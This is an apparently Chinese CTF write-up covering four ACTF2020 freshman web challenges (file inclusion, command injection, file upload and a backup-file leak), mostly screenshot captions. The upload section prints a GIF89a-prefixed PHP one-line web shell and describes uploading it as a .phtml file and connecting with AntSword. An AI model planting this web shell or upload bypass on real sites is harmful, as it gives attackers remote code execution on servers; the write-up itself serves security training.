[ACTF2020 新生赛]

Include1

进入题目

image 43 - [ACTF2020 新生赛]

使用伪协议

image 45 - [ACTF2020 新生赛]

解密

image 46 - [ACTF2020 新生赛]

Exec1

进入题目

image 47 - [ACTF2020 新生赛]

使用|| 尝试输入命令

image 48 - [ACTF2020 新生赛]

当前目录下没有flag 从根目录找

image 49 - [ACTF2020 新生赛]

查看flag

image 50 - [ACTF2020 新生赛]

Upload1

进入题目

image 52 - [ACTF2020 新生赛]

尝试前端绕过 发现不可行

image 53 - [ACTF2020 新生赛]

可能后台有白名单

fuzz一下 发现phtml文件可以上传

image 54 - [ACTF2020 新生赛]

文件代码

GIF89a
<script language="php">eval($_POST['shell']);</script>

上传成功

image 55 - [ACTF2020 新生赛]

使用蚁剑连接

image 56 - [ACTF2020 新生赛]

查看flag

image 57 - [ACTF2020 新生赛]

BackupFile1

进入题目

image 59 - [ACTF2020 新生赛]

提示我们需要进行漏扫

使用御剑或者dirsearch进行扫描发现目录index.php.bak

访问这个目录时自动下载这个bak 然后打开查看

image 61 - [ACTF2020 新生赛]

获得flag的条件是我们输入的key的整数值和str的整数值一样

所以我们输入key的值为123 得到flag

image 62 - [ACTF2020 新生赛]

[极客大挑战 2019]Havefun

上一篇

[极客大挑战 2019]Secret File

下一篇
评论
发表评论 说点什么
还没有评论
121